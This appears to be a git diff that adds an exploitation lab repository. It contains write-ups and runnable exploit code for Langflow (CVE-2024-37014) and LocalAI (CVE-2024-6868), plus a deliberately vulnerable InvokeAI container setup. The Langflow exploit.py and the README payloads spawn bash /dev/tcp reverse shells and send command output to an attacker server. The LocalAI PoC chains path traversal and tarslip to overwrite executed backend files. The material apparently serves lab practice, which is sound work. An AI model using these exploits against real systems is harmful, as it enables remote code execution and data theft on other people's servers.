diff --git a/exploitation/Langflow_v1.0.12/Makefile b/exploitation/Langflow_v1.0.12/Makefile new file mode 100644 index 0000000..f12d996 --- /dev/null +++ b/exploitation/Langflow_v1.0.12/Makefile @@ -0,0 +1,35 @@ +# exploitation/Langflow/Makefile +TARGET_URL ?= http://localhost:7860 +LISTENER_IP ?= $(shell ip route get 1.1.1.1 2>/dev/null | awk '{for(i=1;i<=NF;i++) if($$i=="src") print $$(i+1)}') +LISTENER_PORT ?= 1234 + +.PHONY: attack listen help + +help: + @echo "" + @echo " make listen - Start netcat listener on LISTENER_PORT" + @echo " make attack - Run the exploit (two-stage RCE)" + @echo " make attack LISTENER_IP=<ip> - Override attacker IP manually" + @echo "" + @echo " Detected LISTENER_IP : $(LISTENER_IP)" + @echo " TARGET_URL : $(TARGET_URL)" + @echo " LISTENER_PORT : $(LISTENER_PORT)" + @echo "" + +listen: + @echo "[*] Starting listener on port $(LISTENER_PORT) ..." + nc -lvnp $(LISTENER_PORT) + +attack: + @if [ -z "$(LISTENER_IP)" ]; then \ + echo "[-] Could not auto-detect LISTENER_IP."; \ + echo "[-] Run: make attack LISTENER_IP=<ip>"; \ + exit 1; \ + fi + @echo "[*] LISTENER_IP = $(LISTENER_IP)" + @echo "[*] TARGET_URL = $(TARGET_URL)" + @echo "[*] Launching exploit ..." + python3 exploit.py \ + --url $(TARGET_URL) \ + --ip $(LISTENER_IP) \ + --port $(LISTENER_PORT) diff --git a/exploitation/Langflow_v1.0.12/README.md b/exploitation/Langflow_v1.0.12/README.md new file mode 100644 index 0000000..4dbf74a --- /dev/null +++ b/exploitation/Langflow_v1.0.12/README.md @@ -0,0 +1,245 @@ +# Writeup + +## **1. Introduction** + +This writeup details the penetration testing methodology used to discover and exploit a Remote Code Execution (RCE) vulnerability in Langflow’s Custom Component feature. The goal is to approach the pentest as an external attacker, moving from reconnaissance to full exploitation. + +--- + +## **2. Reconnaissance** + +### **2.1 Identifying the Target** + +We begin by scanning the target network to identify open ports and services using **Nmap**. 
This allows us to determine what services are running and whether there are any potential attack vectors. + +```bash +nmap -sC -sV -A -p- <LAB_IP> +``` + +Output: + +![image.png](images/image.png) + +From the scan results, we observe that an **HTTP service is running on port 7860**, serving a web application via **Uvicorn**, a common ASGI server for Python applications. The HTTP response contains **"Langflow"** in the `<title>` tag, strongly indicating that this service is running **Langflow**. + +### **2.2 Web Enumeration** + +Once we identify a web service, the next step is to gather more information about it. + +### **Checking the Langflow UI** + +We open the web application in our browser by navigating to `http://<LAB_IP>:7860`. The Langflow interface loads, confirming that the service is active. + +![image.png](images/image%201.png) + +The version doesn’t seem to be on the front page, so we start a **new Blank Flow project** within Langflow. + +![image.png](images/image%202.png) + +While exploring the UI, we notice a **button in the bottom-left corner** that displays the version number when we hover over it. By doing this, we confirm that **Langflow v1.0.12** is in use. + +![image.png](images/image%203.png) + +--- + +## **3. Vulnerability Research** + +### **3.1 Checking for Known CVEs** + +Since we identified Langflow **1.0.12**, the next logical step is to check whether there are any known vulnerabilities for this version. We manually check online sources such as: + +- [Exploit-DB](https://www.exploit-db.com/) +- [CVE Details](https://www.cvedetails.com/) +- [GitHub Security Advisories](https://github.com/advisories) + +During our research, we discover that the **Custom Component feature** allows arbitrary Python execution, making it a potential entry point for **Remote Code Execution (RCE)**. 
+ +### **3.2 Vulnerability Overview: Remote Code Execution (RCE) via Custom Component Feature** + +Langflow’s **Custom Component** feature is designed to let users create and execute their own Python scripts within the framework. While this is a powerful tool for extending functionality, it introduces a critical security flaw when Langflow is hosted online. + +The issue lies in the **`POST /api/v1/custom_component`** endpoint, which processes user-supplied Python scripts without proper validation or sandboxing. This means an attacker can craft a malicious payload, send it to the server, and execute arbitrary Python code—effectively gaining full control over the system. + +Without restrictions on what code can be executed, this feature becomes a direct gateway to **Remote Code Execution (RCE)**. If exploited, an attacker could install backdoors, exfiltrate sensitive data, or pivot deeper into the network. This vulnerability, tracked as **CVE-2024-37014**, highlights the dangers of executing user-provided code in an unsanitized environment. + +<aside> +💡 + +**CVE-2024-37014** is a critical vulnerability affecting **Langflow versions up to (and including) 0.6.19** yet it seems to still affect **version 1.0.12** + +</aside> + +--- + +## **4. Exploitation** + +### **4.1 Exploiting the Custom Component Feature** + +Since the **Custom Component** feature allows users to upload custom Python scripts, we attempt to execute arbitrary system commands. + +### **Step 1: Create a New Project** + +Start by initializing a new project within the Langflow application. This will serve as the base for testing the vulnerability. + +Click on the New Project button: + +![image.png](images/image%204.png) + +Choose a Blank Flow: + +![image.png](images/image%205.png) + +Search for "Custom Components" in the menu on the left. 
Drag and drop a custom component onto the blank canvas: + +![image.png](images/image%206.png) + +Click on the code icon that appears on top of the component to open the Edit Code window: + +![image.png](images/image%207.png) + +### **Step 2: Implement the Malicious Python Function:** + +Within the `Component` class of the `CustomComponent`, include the following Python function. This function is designed to execute arbitrary system commands and send the output to our server: + +```python +import subprocess +import requests +import base64 + +def execute_and_send(): + result = subprocess.run(['uname', '-a'], capture_output=True, text=True) + if result.stderr: + print("Error:", result.stderr) + return + encoded_output = base64.b64encode(result.stdout.encode()).decode() + requests.get(f"http://<YOUR-SERVER>/?data={encoded_output}") + +execute_and_send() +``` + +This script uses Python's `subprocess` module to execute a system command (`uname -a`), which returns system information. It then Base64 encodes the output and sends it to a server via a `GET` request, where the data is sent as a query parameter. + +<aside> +💡 + +Be sure to add the payload to the component’s code, rather than replacing the existing code entirely. + +</aside> + +This is an example of what the custom component code would look like with the payload injected: + +```python +# from langflow.field_typing import Data +from langflow.custom import Component +from langflow.io import MessageTextInput, Output +from langflow.schema import Data +import subprocess +import base64 +import requests + +class CustomComponent(Component): + display_name = "Custom Component" + description = "Use as a template to create your own component." 
+ documentation: str = "http://docs.langflow.org/components/custom" + icon = "custom_components" + name = "CustomComponent" + + inputs = [ + MessageTextInput(name="input_value", display_name="Input Value", value="Hello, World!"), + ] + + outputs = [ + Output(display_name="Output", name="output", method="build_output"), + ] + + def build_output(self) -> Data: + data = Data(value=self.input_value) + self.status = data + return data + + def execute_and_send(): + # Execute arbitrary system command + result = subprocess.run(['uname', '-a'], capture_output=True, text=True) + if result.stderr: + print("Error:", result.stderr) + return + + # Base64 encode the output + encoded_output = base64.b64encode(result.stdout.encode()).decode() + + # Make a GET request with the base64 string as a query parameter + url = f"https://<YOUR-SERVER>?data={encoded_output}" + response = requests.get(url) + + execute_and_send() + +``` + +### **Step 3: Invoke Custom Component API:** + +After creating the custom component with the malicious code, click on the “Check & Save” button in the Langflow UI and run the component with the arrow on the top right of the component. This action triggers the `/api/v1/custom_component` API, which processes the provided Python script. + +![image.png](images/image%208.png) + +### **Step 4: Observe Arbitrary Command Execution:** + +Once the script is processed, the command (`uname -a`) will execute on the server. The output is captured, encoded in Base64, and sent to the specified malicious server via the `GET` request. 
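To catch and decode the exfiltrated output on the attacker side, a few lines of Python are enough. The sketch below is illustrative and not part of the original exploit; the port (8000) and the handler name are assumptions:

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse


class ExfilHandler(BaseHTTPRequestHandler):
    """Decode the Base64 blob the payload sends as ?data=<b64>."""

    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        for blob in params.get("data", []):
            # errors="replace" keeps the listener alive on malformed bytes
            print(base64.b64decode(blob).decode(errors="replace"))
        self.send_response(200)
        self.end_headers()


def serve(port: int = 8000) -> None:
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()

# serve()  # run this on the attacker machine before triggering the component
```

Alternatively, the captured query string can be decoded manually with `base64 -d` straight from the access log.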
### **Step 5: Establishing a Reverse Shell** + +To gain interactive access, we upgrade our exploit to spawn a **reverse shell**: + +```python +# from langflow.field_typing import Data +from langflow.custom import Component +from langflow.io import MessageTextInput, Output +from langflow.schema import Data +import subprocess + +class CustomComponent(Component): + display_name = "Custom Component" + description = "Use as a template to create your own component." + documentation: str = "http://docs.langflow.org/components/custom" + icon = "custom_components" + name = "CustomComponent" + + inputs = [ + MessageTextInput(name="input_value", display_name="Input Value", value="Hello, World!"), + ] + + outputs = [ + Output(display_name="Output", name="output", method="build_output"), + ] + + def build_output(self) -> Data: + # Store the reverse shell command in result + result = subprocess.run( + ["bash", "-c", "bash -i >& /dev/tcp/<YOUR-SERVER>/1234 0>&1"], + capture_output=True, + text=True + ) + + if result.stderr: + return Data(value=f"Error: {result.stderr}") + + return Data(value="Command executed") +``` + +We start a listener on our machine: + +```bash +nc -lvnp 1234 +``` + +We Check & Save our custom component code, then press Run. + +After executing the payload, we receive a shell on the target machine, confirming **Remote Code Execution**. + +![image.png](images/image%209.png) + +--- + +## **5. Conclusion** + +This penetration test demonstrates how an attacker can leverage the insecure execution of user-defined Python scripts within Langflow’s **Custom Component feature** to gain **Remote Code Execution (RCE)**. 
\ No newline at end of file diff --git a/exploitation/Langflow_v1.0.12/exploit.py b/exploitation/Langflow_v1.0.12/exploit.py new file mode 100644 index 0000000..9a0ff8a --- /dev/null +++ b/exploitation/Langflow_v1.0.12/exploit.py @@ -0,0 +1,216 @@ +import requests +import argparse +import json +import time + + +def run_exploit(target_url, listener_ip, listener_port): + print(f"[*] Targeting: {target_url}") + print(f"[*] Reverse shell -> {listener_ip}:{listener_port}") + + s = requests.Session() + s.headers.update({"Content-Type": "application/json"}) + + # ------------------------------------------------------------------ # + # The actual Langflow 1.0.x execution flow (mirrors the UI): # + # 1. POST /api/v1/flows/ -> create flow, get flow_id # + # 2. POST /api/v1/build/{id}/vertices -> get vertex list # + # 3. POST /api/v1/build/{id}/vertices/{vertex_id} -> EXECUTES code # + # ------------------------------------------------------------------ # + + malicious_code = f"""from langflow.custom import Component +from langflow.io import MessageTextInput, Output +from langflow.schema import Data +import subprocess + +class CustomComponent(Component): + display_name = "Custom Component" + description = "Use as a template to create your own component." 
+ documentation: str = "http://docs.langflow.org/components/custom" + icon = "custom_components" + name = "CustomComponent" + + inputs = [ + MessageTextInput(name="input_value", display_name="Input Value", value="Hello, World!"), + ] + + outputs = [ + Output(display_name="Output", name="output", method="build_output"), + ] + + def build_output(self) -> Data: + subprocess.Popen( + ["bash", "-c", "bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"], + close_fds=True, + start_new_session=True + ) + return Data(value="ok") +""" + + # ------------------------------------------------------------------ # + # STEP 1 — Validate code via custom_component (optional, mirrors UI) # + # ------------------------------------------------------------------ # + print("[*] Step 1 — validating component code ...") + try: + r = s.post(f"{target_url}/api/v1/custom_component", + data=json.dumps({"code": malicious_code}), timeout=10) + print(f" Status: {r.status_code}") + if r.status_code != 200: + print(f" Warning: {r.text[:200]}") + except Exception as e: + print(f" Warning: {e}") + + # ------------------------------------------------------------------ # + # STEP 2 — Create a flow containing the malicious component # + # ------------------------------------------------------------------ # + print("[*] Step 2 — creating flow ...") + + flow_payload = { + "name": "exploit", + "description": "", + "data": { + "nodes": [{ + "id": "pwn1", + "type": "genericNode", + "position": {"x": 100, "y": 100}, + "data": { + "id": "pwn1", + "type": "CustomComponent", + "node": { + "template": { + "_type": "Component", + "code": { + "type": "code", + "required": True, + "placeholder": "", + "list": False, + "show": True, + "multiline": True, + "value": malicious_code, + "password": False, + "name": "code", + "display_name": "Code", + "advanced": False, + "dynamic": False, + "info": "", + "fileTypes": [], + "file_path": "" + }, + "input_value": { + "type": "str", + "required": False, + "placeholder": 
"", + "list": False, + "show": True, + "multiline": False, + "value": "Hello, World!", + "password": False, + "name": "input_value", + "display_name": "Input Value", + "advanced": False, + "dynamic": False, + "info": "" + } + }, + "description": "Use as a template to create your own component.", + "display_name": "Custom Component", + "documentation": "http://docs.langflow.org/components/custom", + "base_classes": ["Data"], + "outputs": [{ + "name": "output", + "display_name": "Output", + "method": "build_output", + "selected": "Data", + "types": ["Data"] + }] + }, + "value": "CustomComponent" + } + }], + "edges": [], + "viewport": {"zoom": 1, "x": 0, "y": 0} + } + } + + flow_id = None + try: + r = s.post(f"{target_url}/api/v1/flows/", + data=json.dumps(flow_payload), timeout=10) + print(f" Status: {r.status_code}") + if r.status_code in (200, 201): + flow_id = r.json().get("id") + print(f" Flow ID: {flow_id}") + else: + print(f" Error: {r.text[:300]}") + return + except Exception as e: + print(f" Error: {e}") + return + + # ------------------------------------------------------------------ # + # STEP 3 — Get vertices (initialise the build graph) # + # ------------------------------------------------------------------ # + print("[*] Step 3 — initialising build graph ...") + vertex_id = None + try: + r = s.post(f"{target_url}/api/v1/build/{flow_id}/vertices", + data=json.dumps({}), timeout=10) + print(f" Status: {r.status_code}") + if r.status_code == 200: + data = r.json() + # Response contains ids of vertices to build in order + ids = data.get("ids", []) + print(f" Vertices to build: {ids}") + if ids: + vertex_id = ids[0] + else: + print(f" Error: {r.text[:300]}") + except Exception as e: + print(f" Error: {e}") + + if not vertex_id: + # fallback: use node id directly + vertex_id = "pwn1" + print(f" Falling back to vertex_id: {vertex_id}") + + # ------------------------------------------------------------------ # + # STEP 4 — Build the vertex → EXECUTES 
build_output() # + # ------------------------------------------------------------------ # + print(f"[*] Step 4 — building vertex {vertex_id} (triggers RCE) ...") + print("[*] Check your listener NOW ...") + try: + r = s.post( + f"{target_url}/api/v1/build/{flow_id}/vertices/{vertex_id}", + data=json.dumps({ + "inputs": {"input_value": "Hello, World!"}, + "data": {"node": {"template": {"input_value": {"value": "Hello, World!"}}}} + }), + timeout=15 + ) + print(f" Status: {r.status_code}") + if r.status_code == 200: + print("[+] Vertex built successfully — shell should be active!") + else: + print(f" Response: {r.text[:300]}") + except requests.exceptions.Timeout: + print("[+] Request timed out — shell likely active, check your listener!") + except Exception as e: + print(f" Error: {e}") + + # Cleanup + try: + s.delete(f"{target_url}/api/v1/flows/{flow_id}", timeout=5) + except Exception: + pass + + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="CVE-2024-37014 — Langflow <=1.0.12 Unauthenticated RCE via Custom Component" + ) + parser.add_argument("--url", required=True, help="Langflow base URL e.g. 
http://localhost:7860") + parser.add_argument("--ip", required=True, help="Attacker IP for reverse shell callback") + parser.add_argument("--port", default="1234", help="Listener port (default: 1234)") + args = parser.parse_args() + + run_exploit(args.url, args.ip, args.port) diff --git a/exploitation/Langflow_v1.0.12/images/image 1.png b/exploitation/Langflow_v1.0.12/images/image 1.png new file mode 100644 index 0000000..0b56ba4 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 1.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 2.png b/exploitation/Langflow_v1.0.12/images/image 2.png new file mode 100644 index 0000000..7b20fe8 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 2.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 3.png b/exploitation/Langflow_v1.0.12/images/image 3.png new file mode 100644 index 0000000..d22eede Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 3.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 4.png b/exploitation/Langflow_v1.0.12/images/image 4.png new file mode 100644 index 0000000..15a4931 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 4.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 5.png b/exploitation/Langflow_v1.0.12/images/image 5.png new file mode 100644 index 0000000..95efdd4 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 5.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 6.png b/exploitation/Langflow_v1.0.12/images/image 6.png new file mode 100644 index 0000000..45c39a8 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 6.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 7.png b/exploitation/Langflow_v1.0.12/images/image 7.png new file mode 100644 index 0000000..3686d5e Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 7.png differ diff --git 
a/exploitation/Langflow_v1.0.12/images/image 8.png b/exploitation/Langflow_v1.0.12/images/image 8.png new file mode 100644 index 0000000..411c056 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 8.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image 9.png b/exploitation/Langflow_v1.0.12/images/image 9.png new file mode 100644 index 0000000..3cd96f3 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image 9.png differ diff --git a/exploitation/Langflow_v1.0.12/images/image.png b/exploitation/Langflow_v1.0.12/images/image.png new file mode 100644 index 0000000..7bb1d88 Binary files /dev/null and b/exploitation/Langflow_v1.0.12/images/image.png differ diff --git a/exploitation/LocalAI_v2.17.1/README.md b/exploitation/LocalAI_v2.17.1/README.md new file mode 100644 index 0000000..de5f5c0 --- /dev/null +++ b/exploitation/LocalAI_v2.17.1/README.md @@ -0,0 +1,187 @@ +# LocalAI-CVE-2024-6868 + +In this writeup, we’ll go through the steps to obtain a reverse shell on LocalAI, a well-known open-source alternative to OpenAI. + +LocalAI is a self-hosted AI engine used to run models locally and generate text, audio, images and more. We will be exploiting one of its features, which allows the user to upload additional files for a model to use. + +# Machine Walkthrough + +We start by enumerating the machine with a simple port scan. + +![image.png](images/image.png) + +![image.png](images/image%201.png) + +An HTTP service is running on port 8080. + +We visit the website: + +![image.png](images/image%202.png) + +The first thing that catches our eye is the LocalAI version shown at the bottom of the page: v2.17.1. A quick search reveals a public vulnerability: + +![image.png](images/image%203.png) + +**CVE-2024-6868:** The LocalAI model’s configuration allows users to specify additional files that will be used by the model. If the user sends archives, they will be automatically extracted after their download. 
This enables a "tarslip": writing files to arbitrary locations, bypassing the checks that otherwise keep everything inside the models directory. + +So we can write any file we like on the server, as long as it does not already exist. That is a vulnerability in itself, but to achieve code execution we need to find a file that the service executes, delete it, and upload our payload in its place. + +The LocalAI process copies backend assets to the path /tmp/localai/backend_data/backend-assets. These copies are generally writable by the server and are executed when a model is loaded. + +![image.png](images/image%204.png) + +Overwriting one of these files and then running a model that uses the corresponding backend leads to an easy RCE. +I recommend reading the excellent report by Ozelis, the researcher behind this finding, at [https://huntr.com/bounties/f91fb287-412e-4c89-87df-9e4b6e609647](https://huntr.com/bounties/f91fb287-412e-4c89-87df-9e4b6e609647). Save the PoC included in the report to a Python script. + +### PoC + +This script first deletes the target file on the server (if it exists) by exploiting another vulnerability. Then it creates a model and downloads its files. Next, our payload is placed in a tar file and uploaded to the server. The trick is that the tar archive contains a symlink to the target path where we want our payload to end up. The tar archive is then automatically extracted on the server. 
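The symlink trick at the heart of the PoC below can be sketched in isolation. This is an illustrative fragment with made-up paths (`/opt/target`, `payload.bin`), not part of the original PoC:

```python
import io
import tarfile

TARGET_DIR = "/opt/target"  # hypothetical directory outside the models dir

# Archive 1: a single symlink member. After a naive extraction,
# <models>/redirect is a symlink pointing at TARGET_DIR.
link_tar = io.BytesIO()
with tarfile.open(fileobj=link_tar, mode="w") as tar:
    info = tarfile.TarInfo("redirect")
    info.type = tarfile.SYMTYPE
    info.linkname = TARGET_DIR
    tar.addfile(info)

# Archive 2: a regular file stored under the symlink's name. Extracting
# "redirect/payload.bin" follows the symlink, so the file actually lands
# at /opt/target/payload.bin -- outside the extraction root.
payload = b"#!/bin/sh\necho pwned\n"
esc_tar = io.BytesIO()
with tarfile.open(fileobj=esc_tar, mode="w") as tar:
    info = tarfile.TarInfo("redirect/payload.bin")
    info.size = len(payload)
    info.mode = 0o755
    tar.addfile(info, io.BytesIO(payload))
```

An extractor that resolves member paths naively, which is the behavior the CVE describes, writes the second archive's contents through the symlink created by the first.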
+ +```python +import json, time, tarfile + +from io import BytesIO +from random import randbytes, randint +from pathlib import Path +from argparse import ArgumentParser +from requests import Session + +from http.server import HTTPServer, BaseHTTPRequestHandler +from multiprocessing import Process, Queue + +# small template for models that will be served to localai: +model_tmpl = """ +name: {} +files: + - filename: {} + uri: {} +""" + +g_queue = Queue() # used for some janky ipc with http server + +class HttpHandler(BaseHTTPRequestHandler): + def log_message(self, format, *args): + pass + + def do_GET(self): + self.send_response(200) + self.send_header('content-type', 'application/text') + self.end_headers() + rsp = g_queue.get() + print(f"response to {self.path}:", rsp[:64], "...") + self.wfile.write(rsp) + +def run_httpd(lhost, lport): + print(f"running httpserver on {lhost}:{lport}") + httpd = HTTPServer((lhost, lport), HttpHandler) + httpd.serve_forever() + +if __name__ == "__main__": + parser = ArgumentParser() + parser.add_argument("--lhost", default="localhost") + parser.add_argument("--url", default="http://localhost:8080") + parser.add_argument("--local_path", default="poc.txt") + parser.add_argument("--remote_path", default="/tmp/poc.txt") + args = parser.parse_args() + + remote_path = Path(args.remote_path) + + # --lhost is attackers host as seen from the localai, so if localai + # runs in docker use 172.17.0.1 (or something like that depending on + # your system), if running locally just use localhost: + lport = randint(50000, 60000) + attacker_url = f"http://{args.lhost}:{lport}" + + # run http service that will serve the files: + proc = Process(target=run_httpd, args=(args.lhost, lport)) + proc.start() + time.sleep(1) + + with Session() as s: + # use another vulnerability to delete the target first, because our "arbitrary" + # write can not overwrite files, just write a new file: + m_name = "m_" + randbytes(4).hex() + g_queue.put(f"name: 
{m_name}\n".encode()) + rsp = s.post(f"{args.url}/models/apply", json={ + "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml", + "overrides" : { + "mmproj" : f"../../../../../../../../../../{args.remote_path}", + } + }) + rsp = s.post(f"{args.url}/models/delete/{m_name}") + + # create a model from a config and let it download the files. If the file is an archive + # it will automatically uncompress the contents: + m_name = "m_" + randbytes(4).hex() + model_yaml = model_tmpl.format(m_name, f"{m_name}.tar", f"{attacker_url}/{m_name}.tar") + + g_queue.put(model_yaml.encode()) + rsp = s.post(f"{args.url}/models/apply", json={ + "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml", + }) + + # create a tar file with a symlink pointing to the directory of `remote_path`. + redirect = randbytes(4).hex() + fake_tar = BytesIO() + with tarfile.open(fileobj=fake_tar, mode="w") as tar: + info = tarfile.TarInfo(redirect) + info.type = tarfile.SYMTYPE + info.linkname = str(remote_path.parent) + tar.addfile(info) + + g_queue.put(fake_tar.getvalue()) + + # do another tarslip, but this time save the .tar file to symlink'ed directory + # so that the contents of this new tar are extracted there. this will allow to + # write a file with the same attributes as `args.local_path` + m_name = "m_" + randbytes(4).hex() + model_yaml = model_tmpl.format(m_name, f"{redirect}/{redirect}.tar", f"{attacker_url}/{m_name}.tar") + g_queue.put(model_yaml.encode()) + + rsp = s.post(f"{args.url}/models/apply", json={ + "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml", + }) + + fake_tar = BytesIO() + with tarfile.open(fileobj=fake_tar, mode="w") as tar: + tar.add(args.local_path, arcname=str(remote_path.name)) + + g_queue.put(fake_tar.getvalue()) + + time.sleep(1) + input("press enter to continue...") + + proc.kill() +``` + +Now, we rests to do is create our payload and run the poc, then request the then malicious model. + +1. 
Create a reverse shell payload: + +![image.png](images/image%205.png) + +Make sure the payload is an executable file (`chmod +x pwn`). + +1. Overwrite one of the backend assets (whisper, for example): + +![image.png](images/image%206.png) + +1. Download a sample .ogg file (it is needed for the model to work): + +![image.png](images/image%207.png) + +1. Upload the model file and inject our malicious backend file: + +![image.png](images/image%208.png) + +1. Start a listener on your attacker machine: + +![image.png](images/image%209.png) + +1. Load the whisper model: + +![image.png](images/image%2010.png) + +pwned :> + +![image.png](images/image%2011.png) \ No newline at end of file diff --git a/exploitation/LocalAI_v2.17.1/images/image 1.png b/exploitation/LocalAI_v2.17.1/images/image 1.png new file mode 100644 index 0000000..a2f5769 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 1.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 10.png b/exploitation/LocalAI_v2.17.1/images/image 10.png new file mode 100644 index 0000000..c29f718 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 10.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 11.png b/exploitation/LocalAI_v2.17.1/images/image 11.png new file mode 100644 index 0000000..55ed5ff Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 11.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 2.png b/exploitation/LocalAI_v2.17.1/images/image 2.png new file mode 100644 index 0000000..a45a15b Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 2.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 3.png b/exploitation/LocalAI_v2.17.1/images/image 3.png new file mode 100644 index 0000000..4cabd52 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 3.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 4.png b/exploitation/LocalAI_v2.17.1/images/image 4.png new 
file mode 100644 index 0000000..210bde9 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 4.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 5.png b/exploitation/LocalAI_v2.17.1/images/image 5.png new file mode 100644 index 0000000..2bec74b Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 5.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 6.png b/exploitation/LocalAI_v2.17.1/images/image 6.png new file mode 100644 index 0000000..81349fc Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 6.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 7.png b/exploitation/LocalAI_v2.17.1/images/image 7.png new file mode 100644 index 0000000..bd16b6f Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 7.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 8.png b/exploitation/LocalAI_v2.17.1/images/image 8.png new file mode 100644 index 0000000..ad72673 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 8.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image 9.png b/exploitation/LocalAI_v2.17.1/images/image 9.png new file mode 100644 index 0000000..22868fa Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image 9.png differ diff --git a/exploitation/LocalAI_v2.17.1/images/image.png b/exploitation/LocalAI_v2.17.1/images/image.png new file mode 100644 index 0000000..f8d2481 Binary files /dev/null and b/exploitation/LocalAI_v2.17.1/images/image.png differ diff --git a/sandboxes/llm_local_InvokeAI_v5.3.0/Containerfile b/sandboxes/llm_local_InvokeAI_v5.3.0/Containerfile new file mode 100644 index 0000000..d1956b1 --- /dev/null +++ b/sandboxes/llm_local_InvokeAI_v5.3.0/Containerfile @@ -0,0 +1,43 @@ +FROM python:3.11-slim + +# Install system dependencies +RUN apt-get update && apt-get install -y \ + git \ + curl \ + libgl1 \ + libglib2.0-0 \ + libsm6 \ + libxext6 \ + libxrender-dev \ + && rm -rf 
/var/lib/apt/lists/* + +# Install InvokeAI 5.3.0 (CPU-only, no GPU required for lab) +RUN pip install --no-cache-dir \ + "invokeai==5.3.0" \ + --extra-index-url https://download.pytorch.org/whl/cpu + +# Pin mediapipe to exactly 0.10.7 (minimum required by InvokeAI 5.3.0). +# Newer mediapipe versions (e.g. 0.10.32) dropped the `solutions` API that +# controlnet-aux 0.0.7 needs (mp.solutions.drawing_utils -> AttributeError). +# 0.10.7 still ships the solutions submodule intact. +RUN pip install --no-cache-dir --force-reinstall "mediapipe==0.10.7" + +# Re-pin numpy to 1.26.4 as required by InvokeAI 5.3.0. +# mediapipe and other deps can silently pull in numpy 2.x, which causes a +# binary ABI mismatch with scikit-image's compiled C extensions: +# "numpy.dtype size changed, may indicate binary incompatibility" +RUN pip install --no-cache-dir --force-reinstall "numpy==1.26.4" + +# Pin picklescan to the vulnerable version (0.0.14). +# This version fails to detect malicious pickle payloads inside .ckpt files, +# which is the root cause of CVE-2024-12029. +RUN pip install --no-cache-dir --force-reinstall "picklescan==0.0.14" + +EXPOSE 9090 + +# InvokeAI 5.x does not accept --host/--port as CLI flags. +# Host and port are configured via environment variables. +ENV INVOKEAI_host=0.0.0.0 +ENV INVOKEAI_port=9090 + +CMD ["invokeai-web"] diff --git a/sandboxes/llm_local_InvokeAI_v5.3.0/Makefile b/sandboxes/llm_local_InvokeAI_v5.3.0/Makefile new file mode 100644 index 0000000..09b749f --- /dev/null +++ b/sandboxes/llm_local_InvokeAI_v5.3.0/Makefile @@ -0,0 +1,55 @@ +IMAGE_NAME := invokeai +CONTAINER_NAME := invokeai +PORT := 9090 +NETWORK := podman + +.PHONY: all build run stop clean ip format + +all: build run + +build: + podman build -f Containerfile -t $(IMAGE_NAME) . 
+
+run:
+	podman run -d \
+		--name $(CONTAINER_NAME) \
+		--network $(NETWORK) \
+		-p $(PORT):$(PORT) \
+		$(IMAGE_NAME)
+	@echo ""
+	@echo " [+] InvokeAI v5.3.0 running at http://localhost:$(PORT)"
+	@echo " [+] CVE-2024-12029 (RCE via model deserialization) is exploitable."
+	@echo " [+] Container IP (use this for --ip when attacking):"
+	@podman inspect $(CONTAINER_NAME) \
+		--format '{{range .NetworkSettings.Networks}} [+] Container IP : {{.IPAddress}}{{end}}'
+	@echo ""
+
+ip:
+	@podman inspect $(CONTAINER_NAME) \
+		--format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'
+
+stop:
+	podman stop $(CONTAINER_NAME) 2>/dev/null || true
+	podman rm $(CONTAINER_NAME) 2>/dev/null || true
+
+clean: stop
+	podman rmi $(IMAGE_NAME) 2>/dev/null || true
+
+format:
+	@echo "[*] Running black formatter..."
+	@if command -v uv >/dev/null 2>&1; then \
+		uv run black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \
+	elif command -v black >/dev/null 2>&1; then \
+		black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \
+	else \
+		echo " [-] black not found. Install with: pip install black"; \
+	fi
+	@echo "[*] Running isort import sorter..."
+	@if command -v uv >/dev/null 2>&1; then \
+		uv run isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \
+	elif command -v isort >/dev/null 2>&1; then \
